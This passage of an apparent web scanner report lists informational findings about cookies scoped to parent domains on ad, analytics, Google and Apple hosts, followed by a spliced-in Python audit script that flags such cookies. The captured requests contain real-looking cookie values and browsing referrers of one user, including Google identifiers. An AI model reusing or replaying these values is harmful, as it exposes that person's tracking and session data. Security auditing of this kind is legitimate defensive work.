P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID PSA OUR IND COM NAV STA"
xserver: www414
Content-Length: 43
Content-Type: image/gif

GIF89a.............!.......,............Q.;

12.23. http://eacustomerservice.112.2o7.net/b/ss/eacustomerservice/1/H.5-Pdv-2/s68422507352661

Summary

Severity:   Information
Confidence:   Certain
Host:   http://eacustomerservice.112.2o7.net
Path:   /b/ss/eacustomerservice/1/H.5-Pdv-2/s68422507352661

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain. The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
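
The check behind findings 12.15 through 12.23, as an added example that is not part of this report and not the scanner's own code: it pulls the Set-Cookie headers out of a raw HTTP response, flags any cookie whose Domain attribute is a proper parent of the issuing host, applies a name heuristic of the kind the report uses to decide whether a cookie "appears to contain a session token", and lists the Secure/HttpOnly flags each cookie lacks. The sample response is copied from 12.15 above with the body and the long pb_rtb_ev value truncated; the session-name hint list is an assumption for illustration, not the scanner's actual rule.

```python
"""Flag Set-Cookie headers scoped to a parent of the issuing host.

Added example for the 'cookie scoped to parent domain' findings; standard
library only. Sample headers are copied (and truncated) from finding 12.15.
"""
from dataclasses import dataclass
from typing import List, Optional


@dataclass
class Cookie:
    name: str
    value: str
    domain: Optional[str] = None   # None => host-only cookie (no Domain attribute)
    path: Optional[str] = None
    secure: bool = False
    httponly: bool = False


def parse_set_cookie(header_value: str) -> Cookie:
    """Parse one Set-Cookie header value. The first ';'-separated element is
    the name=value pair; the rest are attributes."""
    parts = [p.strip() for p in header_value.split(";")]
    name, _, value = parts[0].partition("=")
    cookie = Cookie(name=name.strip(), value=value.strip())
    for attr in parts[1:]:
        key, _, val = attr.partition("=")
        key, val = key.strip().lower(), val.strip()
        if key == "domain":
            # RFC 6265: a leading dot is ignored and matching is case-insensitive
            cookie.domain = val.lower().lstrip(".")
        elif key == "path":
            cookie.path = val
        elif key == "secure":
            cookie.secure = True
        elif key == "httponly":
            cookie.httponly = True
    return cookie


def is_parent_domain(host: str, domain: Optional[str]) -> bool:
    """True when `domain` is a proper parent of `host`, so the cookie is sent to
    every sibling subdomain too (bh.contextweb.com with Domain=.contextweb.com).
    No Domain attribute means a host-only cookie, which is not flagged.
    Caveat: the public suffix list is not consulted, so Domain=.com is flagged
    here even though a browser would reject it."""
    if domain is None:
        return False
    host = host.lower().rstrip(".")
    domain = domain.lower().lstrip(".").rstrip(".")
    return host != domain and host.endswith("." + domain)


# Assumed heuristic (not the scanner's rule): names suggesting a session token.
SESSION_NAME_HINTS = ("sess", "sid", "auth", "token", "login")


def looks_like_session_token(name: str) -> bool:
    return any(hint in name.lower() for hint in SESSION_NAME_HINTS)


def set_cookie_headers(raw_response: str) -> List[str]:
    """Return the values of every Set-Cookie header in a raw HTTP response."""
    values = []
    for line in raw_response.replace("\r\n", "\n").split("\n"):
        if line == "":
            break  # blank line ends the header block
        name, _, value = line.partition(":")
        if name.strip().lower() == "set-cookie":
            values.append(value.strip())
    return values


def audit(host: str, raw_response: str) -> List[dict]:
    """One finding per Set-Cookie header: parent scoping, session-like name,
    and which of Secure/HttpOnly are missing."""
    findings = []
    for value in set_cookie_headers(raw_response):
        c = parse_set_cookie(value)
        findings.append({
            "name": c.name,
            "domain": c.domain,
            "parent_scoped": is_parent_domain(host, c.domain),
            "session_like": looks_like_session_token(c.name),
            "missing_flags": [f for f, on in (("Secure", c.secure), ("HttpOnly", c.httponly)) if not on],
        })
    return findings


# Constructed sample: response headers from finding 12.15, body and the long
# pb_rtb_ev value truncated.
SAMPLE_CONTEXTWEB = "\r\n".join([
    "HTTP/1.1 200 OK",
    "Server: Sun GlassFish Enterprise Server v2.1.1",
    "Cache-Control: no-cache, no-store",
    "Set-Cookie: V=8vciuQJMXXJY; Domain=.contextweb.com; Expires=Mon, 18-Jun-2012 17:04:27 GMT; Path=/",
    "Set-Cookie: pb_rtb_ev=1:537085.E3F32BD05A8DDF4D5646D79640088B.0; Domain=.contextweb.com; Path=/",
    "Content-Type: image/gif",
    "",
    "GIF89a",
])


if __name__ == "__main__":
    for finding in audit("bh.contextweb.com", SAMPLE_CONTEXTWEB):
        print(finding)
```

Why the scoping matters: a cookie carrying Domain=.contextweb.com or Domain=.2o7.net is sent to every host under that domain, so script injection on, or takeover of, any sibling subdomain exposes it. That is why the report keeps these at Information severity: the values are tracking identifiers, not session tokens. Before using the check in a pipeline, add a public suffix lookup so that a Domain set to a public suffix is reported as rejected rather than as parent-scoped.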

Request

GET /b/ss/eacustomerservice/1/H.5-Pdv-2/s68422507352661?[AQB]&ndh=1&t=24/5/2011%208%3A48%3A18%205%20300&ce=UTF-8&pageName=View%20Answer&g=http%3A//support.ea.com/app/answers/detail/a_id/4394&r=http%3A//support.ea.com/&cc=USD&pe=lnk_e&pev1=http%3A//twitter.com/ea&pid=View%20Answer&pidt=1&oid=http%3A//twitter.com/ea&ot=A&s=1920x1200&c=32&j=1.3&v=Y&k=Y&bw=1057&bh=822&p=Shockwave%20Flash%3BJava%20Deployment%20Toolkit%206.0.260.3%3BJava%28TM%29%20Platform%20SE%206%20U26%3BChrome%20PDF%20Viewer%3BGoogle%20Gears%200.5.33.0%3BWPI%20Detector%201.3%3BGoogle%20Update%3BDefault%20Plug-in%3B&[AQE] HTTP/1.1
Host: eacustomerservice.112.2o7.net
Proxy-Connection: keep-alive
Referer: http://support.ea.com/app/answers/detail/a_id/4394
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi_jix60njix60=[CS]v4|26E7E93085160FDF-600001A4C0378917|4DCFD25E[CE]; s_vi_bahfbjx7Dlzx7Dvajxxx7C=[CS]v4|26EBD90485163C58-400001780015DA20|4DD7B207[CE]; s_vi_x60bafx7Bzx7Djmnaajx7Dx7C=[CS]v4|26EBD90585163FFF-400001A60017D693|4DD7B209[CE]; s_vi_x60kx60zeiaf=[CS]v4|26EFC6A30514BC1D-600001636001BB6C|4DDF8D43[CE]; s_vi_fptgfax7Dprgptax7Cx7Bqzzgfx27=[CS]v4|26F1169F0501294E-60000100C01AEF44|4DE22D3C[CE]; s_vi_x7Ehlx7Fx7Ex7Dlx7Fyx7Echz=[CS]v4|26F116C685012EE9-60000106A00109F0|4DE22D8B[CE]; s_vi_ufiiknyfx7Chcx60mnc=[CS]v4|26F48FF085012C77-600001092009679F|4DE91FE0[CE]; s_vi_tghhjoxxgx7Dx7Emcoi=[CS]v4|26F48FF085012C77-60000109200967A1|4DE91FE0[CE]; s_vi_snjbdhj=[CS]v4|26FAF8F5851D3A7D-60000144C0021CC5|4DF5F1E9[CE]; s_vi_pogkrp=[CS]v4|26FAF912850127BE-6000011260007E57|4DF6A820[CE]; s_vi_cx7Emox60ijcx7Eyax7F=[CS]v4|26FDBD8E8516389A-40000182A036DCE4|4DFB7B1A[CE]; s_vi_exxkifoneiy=[CS]v4|26FDBDD785163C8A-600001A4A0410776|4DFB7BAE[CE]; s_vi_ydwuzseyzcbx7Fyxxeuwbwzyq=[CS]v4|26FDBDF385010424-600001042024391B|4DFB7AE9[CE]; s_vi_x7Ecprx7Dtrcx7Cx7Ex7Futx7Cpx7Fu=[CS]v4|26FDBDF905011642-40000102001B21C0|4DFB7AE9[CE]; s_vi_fx7Bhjelfyg=[CS]v4|26FDE30B05012C17-6000010AC028E4D5|4DFBFAA5[CE]; s_vi_x7Fbqsx7Cuex7Eyfubcydi=[CS]v4|26FDBDF3050116C8-400001044015891A|4DFBFAA5[CE]; s_vi_bx7Flnahbycadx7Bh=[CS]v4|26FDE2F5050127E0-40000101E02C31E0|4DFBFAA5[CE]; s_vi_cx7Emox60ikx60cnmx60=[CS]v4|26F55BD905162273-60000183A026495C|4DFC0A43[CE]; s_vi_fx7Bhjeljfd=[CS]v4|26F55BD905162273-60000183A026495E|4DFC0A43[CE]; s_vi_x604hukn=[CS]v4|26FFF4F005012A85-600001170004C104|4DFFE9E0[CE]; s_vi_tghhjoxxgx7Dkykke=[CS]v4|26F48E0705160A5B-60000183E001453B|4E03BA67[CE]; s_vi_cpx7Fx7Fx7Dxxopjx7Cwmx7Ckikpjx7Cx7Euvx7Bxxu=[CS]v4|26F48E0705160A5B-60000183E001453D|4E03BA67[CE]; s_vi_xxderi9ix7Ehdf=[CS]v4|2701DFF385161E82-400001A0C0184269|4E03BFE6[CE]; s_vi_tprdbex7Ex7Ctcbtcgxxrt=[CS]v4|27024A530515B368-4000018120002BF6|4E0494A5[CE]

Response

HTTP/1.1 200 OK
Date: Fri, 24 Jun 2011 13:48:19 GMT
Server: Omniture DC/2.0.0
Set-Cookie: s_vi_tprdbex7Ex7Ctcbtcgxxrt=[CS]v4|27024A530515B368-4000018120002BF6|4E0494A5[CE]; Expires=Wed, 22 Jun 2016 13:48:19 GMT; Domain=.2o7.net; Path=/
X-C: ms-4.4.1
Expires: Thu, 23 Jun 2011 13:48:19 GMT
Last-Modified: Sat, 25 Jun 2011 13:48:19 GMT
Cache-Control: no-cache, no-store, must-revalidate, max-age=0, proxy-revalidate, no-transform, private
Pragma: no-cache
ETag: "4E0495A3-354B-1AB15A04"
Vary: *
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID PSA OUR IND COM NAV STA"
xserver: www664
Content-Length: 43
Content-Type: image/gif

GIF89a.............!.......,............Q.;

12.24. http://eacustomerservice.112.2o7.net/b/ss/eacustomerservice/1/H.5-Pdv-2/s69942647062707

Summary

Severity:   Information
Confidence:   Certain
Host:   http://eacustomerservice.112.2o7.net
Path:   /b/ss/eacustomerservice/1/H.5-Pdv-2/s69942647062707

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain: The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /b/ss/eacustomerservice/1/H.5-Pdv-2/s69942647062707?[AQB]&ndh=1&t=24/5/2011%208%3A44%3A5%205%20300&ce=UTF-8&pageName=Support%20Home&g=http%3A//support.ea.com/&cc=USD&c1=Not%20Logged%20In&v1=Not%20Logged%20In&c15=EA%20Support&s=1920x1200&c=32&j=1.3&v=Y&k=Y&bw=1057&bh=822&p=Shockwave%20Flash%3BJava%20Deployment%20Toolkit%206.0.260.3%3BJava%28TM%29%20Platform%20SE%206%20U26%3BChrome%20PDF%20Viewer%3BGoogle%20Gears%200.5.33.0%3BWPI%20Detector%201.3%3BGoogle%20Update%3BDefault%20Plug-in%3B&[AQE] HTTP/1.1
Host: eacustomerservice.112.2o7.net
Proxy-Connection: keep-alive
Referer: http://support.ea.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi_jix60njix60=[CS]v4|26E7E93085160FDF-600001A4C0378917|4DCFD25E[CE]; s_vi_bahfbjx7Dlzx7Dvajxxx7C=[CS]v4|26EBD90485163C58-400001780015DA20|4DD7B207[CE]; s_vi_x60bafx7Bzx7Djmnaajx7Dx7C=[CS]v4|26EBD90585163FFF-400001A60017D693|4DD7B209[CE]; s_vi_x60kx60zeiaf=[CS]v4|26EFC6A30514BC1D-600001636001BB6C|4DDF8D43[CE]; s_vi_fptgfax7Dprgptax7Cx7Bqzzgfx27=[CS]v4|26F1169F0501294E-60000100C01AEF44|4DE22D3C[CE]; s_vi_x7Ehlx7Fx7Ex7Dlx7Fyx7Echz=[CS]v4|26F116C685012EE9-60000106A00109F0|4DE22D8B[CE]; s_vi_ufiiknyfx7Chcx60mnc=[CS]v4|26F48FF085012C77-600001092009679F|4DE91FE0[CE]; s_vi_tghhjoxxgx7Dx7Emcoi=[CS]v4|26F48FF085012C77-60000109200967A1|4DE91FE0[CE]; s_vi_snjbdhj=[CS]v4|26FAF8F5851D3A7D-60000144C0021CC5|4DF5F1E9[CE]; s_vi_pogkrp=[CS]v4|26FAF912850127BE-6000011260007E57|4DF6A820[CE]; s_vi_cx7Emox60ijcx7Eyax7F=[CS]v4|26FDBD8E8516389A-40000182A036DCE4|4DFB7B1A[CE]; s_vi_exxkifoneiy=[CS]v4|26FDBDD785163C8A-600001A4A0410776|4DFB7BAE[CE]; s_vi_ydwuzseyzcbx7Fyxxeuwbwzyq=[CS]v4|26FDBDF385010424-600001042024391B|4DFB7AE9[CE]; s_vi_x7Ecprx7Dtrcx7Cx7Ex7Futx7Cpx7Fu=[CS]v4|26FDBDF905011642-40000102001B21C0|4DFB7AE9[CE]; s_vi_fx7Bhjelfyg=[CS]v4|26FDE30B05012C17-6000010AC028E4D5|4DFBFAA5[CE]; s_vi_x7Fbqsx7Cuex7Eyfubcydi=[CS]v4|26FDBDF3050116C8-400001044015891A|4DFBFAA5[CE]; s_vi_bx7Flnahbycadx7Bh=[CS]v4|26FDE2F5050127E0-40000101E02C31E0|4DFBFAA5[CE]; s_vi_cx7Emox60ikx60cnmx60=[CS]v4|26F55BD905162273-60000183A026495C|4DFC0A43[CE]; s_vi_fx7Bhjeljfd=[CS]v4|26F55BD905162273-60000183A026495E|4DFC0A43[CE]; s_vi_x604hukn=[CS]v4|26FFF4F005012A85-600001170004C104|4DFFE9E0[CE]; s_vi_tghhjoxxgx7Dkykke=[CS]v4|26F48E0705160A5B-60000183E001453B|4E03BA67[CE]; s_vi_cpx7Fx7Fx7Dxxopjx7Cwmx7Ckikpjx7Cx7Euvx7Bxxu=[CS]v4|26F48E0705160A5B-60000183E001453D|4E03BA67[CE]; s_vi_xxderi9ix7Ehdf=[CS]v4|2701DFF385161E82-400001A0C0184269|4E03BFE6[CE]

Response

HTTP/1.1 200 OK
Date: Fri, 24 Jun 2011 13:44:06 GMT
Server: Omniture DC/2.0.0
Set-Cookie: s_vi_tprdbex7Ex7Ctcbtcgxxrt=[CS]v4|27024A530515B795-6000018160001985|4E0494A5[CE]; Expires=Wed, 22 Jun 2016 13:44:06 GMT; Domain=.2o7.net; Path=/
X-C: ms-4.4.1
Expires: Thu, 23 Jun 2011 13:44:06 GMT
Last-Modified: Sat, 25 Jun 2011 13:44:06 GMT
Cache-Control: no-cache, no-store, must-revalidate, max-age=0, proxy-revalidate, no-transform, private
Pragma: no-cache
ETag: "4E0494A6-6F1B-46C49248"
Vary: *
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID PSA OUR IND COM NAV STA"
xserver: www411
Content-Length: 43
Content-Type: image/gif

GIF89a.............!.......,............Q.;

12.25. http://ib.adnxs.com/seg

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ib.adnxs.com
Path:   /seg

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain: The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /seg?add=116889&t=2 HTTP/1.1
Host: ib.adnxs.com
Proxy-Connection: keep-alive
Referer: http://s7.addthis.com/static/r07/sh45.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __ar_v4=OZVXN65U6VG3BGSO7THUYQ%3A20110616%3A1%7CWRSB44J6LBBYHJ46YBYSXU%3A20110616%3A2%7C3FSLMUQHHZF3ZGSHGFBTCR%3A20110616%3A1%7CO5SUSHFLMFHUBPFB64PGTV%3A20110616%3A2%7CPM4V2RLCAZHMPP5I42UJOL%3A20110620%3A1%7CAG2H3EESGBBUTM6CFDP2IB%3A20110620%3A1; icu=ChIImdYCEAoYAiACKAIw2_f97wQQ2_f97wQYAQ..; anj=Kfw)(>Mwz%)_`z[:mPWhOPI9XDFhV./:U50e293-Kvq%pSv/-CrYm4qjBD$l#D6X7kL*Gon#lKeGg(I/0xY%G_wf%/9SAjDR9%mEtufj#5kI+687EEs4`p7@]!Cu'2i*kgqP*gC83(V[bMK+Z!X*h/E@nqY28_[/LHgJALhZ6F`O-W9Y:$uaZey2a9vrW$d=[>)H_]kQ1p:.C_!ftDA7#p2M6-mZ$6Md!-m>]T('5Q5PH9V)4w#p!vR:d^f1l#p?2ndxaH]IB$9^TI>*#bjKq!@wcDPY-fh64Xm$p+Qrw+yDMpTOqtfut3ihD%Pg0DN5X/5YdqnfTjetzaJ>he-w13KS+'9vyjtH)ZY7uy(3p(IUn=TzS*)ESmgwx<wc-[7:cJ%W=+YWoRa6y.'c)1WpOx7Fkso#ovB=o$Y?/srqMUWroyCiVTS(oHlhJU2?5](tdx?e$N0Yk6@uGdmIh3Rs!a6GbEZ4E4)mud^if]1EnJMfnTtvAWfI6j$zZ]h:8FX05B)eJ9Ys>ZX'E9FcQ`_svd*?j7027EQ6:tWVY8iN3/zjKA6]cD28dvlu'pOcY1GietF(FXHVvj5/I*OT3]^H?R$jt41wt7LLYkBjeX8VW56p^!8UJJr4##]ewVu0nM9O%`cMeJ<z>D; sess=1; uuid2=3420415245200633085

Response

HTTP/1.1 302 Found
Cache-Control: no-store, no-cache, private
Pragma: no-cache
Expires: Sat, 15 Nov 2008 16:00:00 GMT
P3P: CP="OTI DSP COR ADMo TAIo PSAo PSDo CONo OUR SAMo OTRo STP UNI PUR COM NAV INT DEM STA PRE LOC"
Set-Cookie: sess=1; path=/; expires=Sat, 25-Jun-2011 13:18:31 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: uuid2=3420415245200633085; path=/; expires=Thu, 22-Sep-2011 13:18:31 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: anj=Kfw)(ByG5K)WgR>?.+UI.b6+F*gFFRYp*xrtU*ZxoKfg>?3=*ijt$+z9$J(!=3[xo+Vdv$CJ[J3)]jfIENCh2k'(YvU>7%w:Ah%lXv2u*lS*i_#:w([I.`GFZV<KPlrE>cBm`g/i@>eoX9SESC@d]ks)brLQUy-Mn:b/AwSLhdgiWVNoZ22VUco)=>ej%`5dFNks^zkSswXXS?5KKvZ0`#34WA:0qW*$^?3?U>lz!8huyZz#@DDavDi9'PZF4^fvCe)YAwg%LO$S<wKCPLGuv#J6FCl3(ahmE/YEN9NG(:KuQ^V6fBc8]!n:lvwN-:Ogsvvq>U`94GCv1UXjSzUSAICm9p^8nEUsig`G'8><fIqzl21[1Ejk?%.m1%Fm.BG7w8FmN^1U?0.h!<k$a_YXcCHD<^=$BsLp$pb?L2+fc.tSY10Jf$PmV(#pIcaA6A2(i')atPd0[!WH-bV<9saxr.g`axSdN%IbK@@feSUTJuWJC!GZYetN(4=%ju`+=fs(K<64Ev(uRdtY_iI!aq>'WzyLmv^Z(]$=ZWPtUvV6L1XnM6U`Z(.jD)EHCsXbooUIwVdPrtYVS(v=M(<nOFD]))e-oIbcz7U4fbFEUz%S7nI_O#q@kKOkupw/iy_vEG4k2yQA@wd6VLq%qxQhzNvWvJ4Hqc^1ts; path=/; expires=Thu, 22-Sep-2011 13:18:31 GMT; domain=.adnxs.com; HttpOnly
Location: http://view.atdmt.com/iaction/adoapn_AppNexusDemoActionTag_1
Date: Fri, 24 Jun 2011 13:18:31 GMT
Content-Length: 0


12.26. http://id.google.com/verify/EAAAAE9TvTdgyDSoIlnihnR2Ctc.gif

Summary

Severity:   Information
Confidence:   Certain
Host:   http://id.google.com
Path:   /verify/EAAAAE9TvTdgyDSoIlnihnR2Ctc.gif

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain: The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /verify/EAAAAE9TvTdgyDSoIlnihnR2Ctc.gif HTTP/1.1
Host: id.google.com
Proxy-Connection: keep-alive
Referer: http://www.google.com/search?sourceid=chrome&ie=UTF-8&q=https%3A%2F%2F174.36.18.902006%2FWizard%2FStart%3FsiteId%3D92907014f563ac53317555e74a1a1a26
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SNID=48=3sKS7bI5pvhoRuaaVyOwnANTv3IHSjqlT0AOE4t_=ZEgwkR1lBvPg8GAt; PREF=ID=381be2a5a4e321de:U=17ea5243225a615b:FF=0:TM=1305295666:LM=1306388828:GM=1:S=c4JmgYF7VRiR-ADW; W6D=v4=0:ds=0:w=1:l=-141:q=0; NID=48=gPq60pUohrGmLnFu_Ata0ovkHaLAI3GbueMkejeohV4ZqsGCTpIwQhkOzLAh08W_WAFKPR6RtENmsRNVdlciFgd2RjpIiQlszeOza-qAv-NiJqt_HnSDwtRgsq1TNt5I

Response

HTTP/1.1 200 OK
Set-Cookie: SNID=48=rlT8MZiINKBIrkeXfgIJb9vgNjpXk4t90QexqxjC=nlt533ILJA5-O8o1; expires=Sun, 25-Dec-2011 02:02:42 GMT; path=/verify; domain=.google.com; HttpOnly
Cache-Control: no-cache, private, must-revalidate
Pragma: no-cache
Expires: Fri, 01 Jan 1990 00:00:00 GMT
Content-Type: image/gif
Date: Sat, 25 Jun 2011 02:02:42 GMT
Server: zwbk
Content-Length: 43
X-XSS-Protection: 1; mode=block

GIF89a.............!.......,...........D..;

12.27. http://id.google.com/verify/EAAAAFJrXTT71NDnXz7YilamQqs.gif

Summary

Severity:   Information
Confidence:   Certain
Host:   http://id.google.com
Path:   /verify/EAAAAFJrXTT71NDnXz7YilamQqs.gif

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain: The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /verify/EAAAAFJrXTT71NDnXz7YilamQqs.gif HTTP/1.1
Host: id.google.com
Proxy-Connection: keep-alive
Referer: http://www.google.com/search?hl=en&q=Spilgames+Internet
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SNID=48=Ur4zoaTzXz_ZUyr_bNG71B00g2QyNve9JxirvLXQ=SpcSyPrhNUXVqSHO; PREF=ID=381be2a5a4e321de:U=17ea5243225a615b:FF=0:TM=1305295666:LM=1306388828:GM=1:S=c4JmgYF7VRiR-ADW; W6D=v4=0:ds=0:w=1:l=-141:q=0; NID=48=gPq60pUohrGmLnFu_Ata0ovkHaLAI3GbueMkejeohV4ZqsGCTpIwQhkOzLAh08W_WAFKPR6RtENmsRNVdlciFgd2RjpIiQlszeOza-qAv-NiJqt_HnSDwtRgsq1TNt5I

Response

HTTP/1.1 200 OK
Set-Cookie: SNID=48=3sKS7bI5pvhoRuaaVyOwnANTv3IHSjqlT0AOE4t_=ZEgwkR1lBvPg8GAt; expires=Sat, 24-Dec-2011 13:26:11 GMT; path=/verify; domain=.google.com; HttpOnly
Cache-Control: no-cache, private, must-revalidate
Pragma: no-cache
Expires: Fri, 01 Jan 1990 00:00:00 GMT
Content-Type: image/gif
Date: Fri, 24 Jun 2011 13:26:11 GMT
Server: zwbk
Content-Length: 43
X-XSS-Protection: 1; mode=block

GIF89a.............!.......,...........D..;

12.28. http://idcs.interclick.com/Segment.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://idcs.interclick.com
Path:   /Segment.aspx

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain: The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /Segment.aspx?sid=4761888b-4251-4912-8743-09bf2fc2ed75 HTTP/1.1
Host: idcs.interclick.com
Proxy-Connection: keep-alive
Referer: http://www.parallels.com/store/plesk/win/addons/?store_id=1&version=10.0.0&os=windows&key=SMB015741170000
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: T=1; uid=u=8fb5e3ac-83a3-4cca-8da7-7f2e4e96648c; sgm=9622=734271&9000=734271&570=734271&410=734271&846=734271&7472=734279&6790=734276&7434=734280&7594=734283&428=734285&11062=734293&11060=734293; tpd=e20=1308573230578&e90=1308838755219&e50=1308573231659&e100=1308838755889

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Length: 70
Content-Type: image/gif
Expires: -1
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
Set-Cookie: sgm=9622=734271&9000=734271&570=734271&410=734271&846=734271&7472=734311&6790=734276&7434=734280&7594=734283&428=734285&11062=734293&11060=734293; domain=.interclick.com; expires=Fri, 25-Jun-2021 02:14:00 GMT; path=/
X-Powered-By: ASP.NET
P3P: policyref="http://www.interclick.com/w3c/p3p.xml",CP="NON DSP ADM DEV PSD OUR IND PRE NAV UNI"
Date: Sat, 25 Jun 2011 02:13:59 GMT

GIF89a...................!..NETSCAPE2.0.....!.......,................;

12.29. http://images.apple.com/global/nav/styles/navigation.css

Summary

Severity:   Information
Confidence:   Certain
Host:   http://images.apple.com
Path:   /global/nav/styles/navigation.css

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain: The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /global/nav/styles/navigation.css HTTP/1.1
Host: images.apple.com
Proxy-Connection: keep-alive
Referer: http://itunes.apple.com/us/app/exxon-mobil-fuel-finder/id397136849?mt=8
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|26E72CC1050115FB-600001068002ECF7[CE]
If-None-Match: "2930-4a3055a8a0000"
If-Modified-Since: Wed, 11 May 2011 19:48:16 GMT

Response

HTTP/1.1 304 Not Modified
Content-Type: text/css
Last-Modified: Wed, 11 May 2011 19:48:16 GMT
ETag: "2930-4a3055a8a0000"
Cache-Control: max-age=354
Expires: Fri, 24 Jun 2011 13:33:51 GMT
Date: Fri, 24 Jun 2011 13:27:57 GMT
Connection: close
Vary: Accept-Encoding
Set-Cookie: ccl=DM6tKPNIkmYZsEVSBSdYOGJ7OTa7PjwA2735gwg+B3srHhFj8YVJDLNI3Wi2SUB1dCqrK7+XltzB/RcTVZmzUffySHH1UmBafoYJMj8YHYwt2pGgPse/fGM3FRGKsYngf6a77lbqVf66I18XlDNjfSTbjjIE0caGcGeQC4Ga/6t7SQdMOjY9JN8DEVW1UMoc6rrdnREZK82vJpIYTfG0q24uni8l6skyzHr5oYaAtC+cEVmOYnxcZEVM/0zwt8pWHHT7wAgPsXOSwDVj2beSsp5/JZ2hxDkV+qJm/gvvlB5s4gKqlC/OkT9MmT5nrCzrHJRdC+dWafIqs+ExZSu4RsRpt+yRsvm+2Ebw4C2MVPVg6mUwoEFIRaz9PCY0pRAq3LXUGVhUO8khrTSYOT60ngG/28nSEmej8riAE3H3pM3Ek1xzfTDSN4w9rduEpmRVOFjfLPb+A3mPF99al/pIw2PdnTJ0NQXeRkmztMT8xZeLjBS/B0mP+3zsHAYthpfDX9LIuH2xTPXrpJX2DeMFKurDBc9hP5LjsnlklHcD2q0g+oy0qYkWk5CBKjp+akzk; path=/; domain=.apple.com
Set-Cookie: geo=US; path=/; domain=.apple.com


12.30. http://images.apple.com/ipod/images/gradient_texture20100901.jpg

Summary

Severity:   Information
Confidence:   Certain
Host:   http://images.apple.com
Path:   /ipod/images/gradient_texture20100901.jpg

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain: The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /ipod/images/gradient_texture20100901.jpg HTTP/1.1
Host: images.apple.com
Proxy-Connection: keep-alive
Referer: http://itunes.apple.com/us/app/exxon-mobil-fuel-finder/id397136849?mt=8
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|26E72CC1050115FB-600001068002ECF7[CE]
Range: bytes=2714-2714
If-None-Match: "a9a-48f2afe054800"

Response

HTTP/1.1 200 OK
Last-Modified: Wed, 01 Sep 2010 04:18:40 GMT
ETag: "a9a-48f2afe054800"
Server: Apache/2.2.14 (Unix)
X-N: S
Content-Length: 2714
Content-Type: image/jpeg
Cache-Control: max-age=492
Expires: Fri, 24 Jun 2011 13:36:09 GMT
Date: Fri, 24 Jun 2011 13:27:57 GMT
Connection: close
Set-Cookie: ccl=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; path=/; domain=.apple.com
